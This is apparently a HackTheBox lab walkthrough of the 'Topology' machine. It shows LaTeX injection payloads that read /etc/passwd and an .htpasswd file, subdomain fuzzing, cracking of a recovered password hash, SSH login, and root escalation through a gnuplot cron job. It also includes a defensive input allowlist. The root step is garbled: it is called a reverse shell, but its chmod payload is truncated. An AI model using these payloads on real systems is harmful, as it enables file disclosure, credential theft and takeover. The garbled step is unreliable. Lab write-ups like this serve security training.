---
# System prepended metadata

title: HACKTHEBOX

---

# HACKTHEBOX

# Topology

![](https://hackmd.io/_uploads/B1awJW-33.png)

## Creating Host

`sudo vim /etc/hosts`

Add the host as `10.10.11.217 topology.htb`

Link: http://topology.htb/

## Scanning

`nmap -A -sV 10.10.11.217`

![](https://hackmd.io/_uploads/SkZYyZ-2h.png)


Visit http://topology.htb/

![](https://hackmd.io/_uploads/HyntkZW33.png)

Found a LaTeX Equation Generator, but it couldn't redirect, so I added this host name to `/etc/hosts`.

Had no idea about this website, so I searched for LaTeX equation vulnerabilities and found **[Formula/CSV/Doc/LaTeX Injection - HackTricks](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection).**

![](https://hackmd.io/_uploads/HyF5y-Zhn.png)


![](https://hackmd.io/_uploads/SJ1o1Wb2h.png)


Now I wanted to read files from the LaTeX code generator.

command: `\input{/etc/passwd}`

💡 It's a LaTeX language issue: when I execute the command it's in "text" mode; by adding `$` it goes into "math mode" to calculate and execute equations.

command: `$\input{/etc/passwd}$`

As we know, the `/etc/passwd` file is used **to keep track of every registered user that has access to a system.**

command: `$\lstinputlisting{/etc/passwd}$`
![](https://hackmd.io/_uploads/HklzWW-hh.jpg)
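
A defensive counterpart to the file reads above, as an added example (not part of the original write-up or the target's code): an allowlist check that an equation renderer could apply before handing input to LaTeX. The macro allowlist, `MAX_LEN` and the function name `check_equation` are assumptions.

```python
import re

# Assumption: the renderer only needs ordinary math macros. This allowlist is
# illustrative; extend it with the macros your users actually need.
ALLOWED_MACROS = {
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times",
    "alpha", "beta", "gamma", "pi", "theta", "left", "right", "le", "ge",
    "neq", "pm", "sin", "cos", "tan", "log", "ln", "mathrm", "mathbf",
}
# Single-character control symbols used for spacing and literal braces.
ALLOWED_SYMBOLS = set(",;:!{}\\ ")
MAX_LEN = 500  # constructed limit for a one-line equation

# A control sequence is a backslash followed by a run of letters (or @),
# by exactly one other character, or by nothing at end of input.
CONTROL_SEQ = re.compile(r"\\([A-Za-z@]+|.|$)", re.DOTALL)


def check_equation(src: str) -> list[str]:
    """Return reasons to reject src; an empty list means it is safe to render."""
    problems = []
    if len(src) > MAX_LEN:
        problems.append("too long")
    # TeX's ^^ notation builds characters at read time (a backslash included),
    # so control sequences written that way would be invisible to the scan below.
    if "^^" in src:
        problems.append("^^ notation")
    for match in CONTROL_SEQ.finditer(src):
        name = match.group(1)
        if name.isalpha():
            if name not in ALLOWED_MACROS:
                problems.append("\\" + name)
        elif name not in ALLOWED_SYMBOLS:
            # Covers names containing @, a dangling backslash, and odd symbols.
            problems.append("\\" + name)
    return problems


if __name__ == "__main__":
    # Constructed samples: one ordinary equation plus the two inputs from this page.
    for sample in (r"\frac{x+5}{y-3}", r"\input{/etc/passwd}",
                   r"$\lstinputlisting{/var/www/dev/.htpasswd}$"):
        print(sample, "->", check_equation(sample) or "ok")
```

Input filtering is one layer only; running the renderer with `-no-shell-escape` and `openin_any = p` in `texmf.cnf` limits what a missed macro can reach.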

Nothing much could be found here, let’s scan for some directories.

## Scanning for Subdomains

Command:  `wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb`

![](https://hackmd.io/_uploads/rk9wZZ-33.png)

Add `dev.topology.htb` and `stats.topology.htb` to `/etc/hosts`.

![](https://hackmd.io/_uploads/SJL2ZWbn2.png)


Now we need to bypass this authentication; as we have seen, this domain is running on Apache/2.4.41.

![](https://hackmd.io/_uploads/Hy3nbb-hh.png)


🔗 Bypass Apache/2.4.41 401 Unauthorized:  [https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/](https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/)

Command: `$\lstinputlisting{/var/www/dev/.htpasswd}$`

![](https://hackmd.io/_uploads/ByYpWZ-n2.png)


Finally found a Hash as a .PNG file.

![](https://hackmd.io/_uploads/HkP0-Zbhn.png)


Hash: `vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0`

## Hash Cracking using John

command: `john --wordlist=/usr/share/wordlists/rockyou.txt hash`

![](https://hackmd.io/_uploads/ryUyM--2h.png)


Output `?:calculus20`

![](https://hackmd.io/_uploads/Sk1ezWb2n.png)


As seen in our initial Nmap scan, we have a few SSH ports open.

## Connect to SSH

command: `ssh vdaisley@topology.htb`

password: `calculus20`

![](https://hackmd.io/_uploads/ByXWG-Z33.png)


For user flag

command: `cat user.txt`

## Gaining Root Access

![](https://hackmd.io/_uploads/SkxTZzZWh2.png)


Nothing interesting found here, except an executable “pspy64”.

💡 pspy is a command line tool designed **to snoop on processes without need for root permissions**.

command: `./pspy64`

![](https://hackmd.io/_uploads/BkAMfbb3n.png)

![](https://hackmd.io/_uploads/ry8QzW-32.png)


command: `cd /opt/gnuplot`

command: `ls`

Output: `ls: cannot open directory '.': Permission denied`

Create a file within the gnuplot dir

command: `nano /opt/gnuplot/root.plt` (run from the `bash-5.0$` prompt)

Reverse Shell - root.plt must contain `system "chmod u+s"`

command: `bash -p` 

```
-p  Turned on whenever the real and effective user ids do not match.
            Disables processing of the $ENV file and importing of shell
            functions.  Turning this option off causes the effective uid and
            gid to be set to the real uid and gid.
```

command: `whoami`   →  root

Obtained the root access. Now, move on to root dir.

command: `cd /root`

`ls` 

`cat root.txt`

Here is the root flag

Output: `bb6b6780329a215d36126b6d6af62f1f`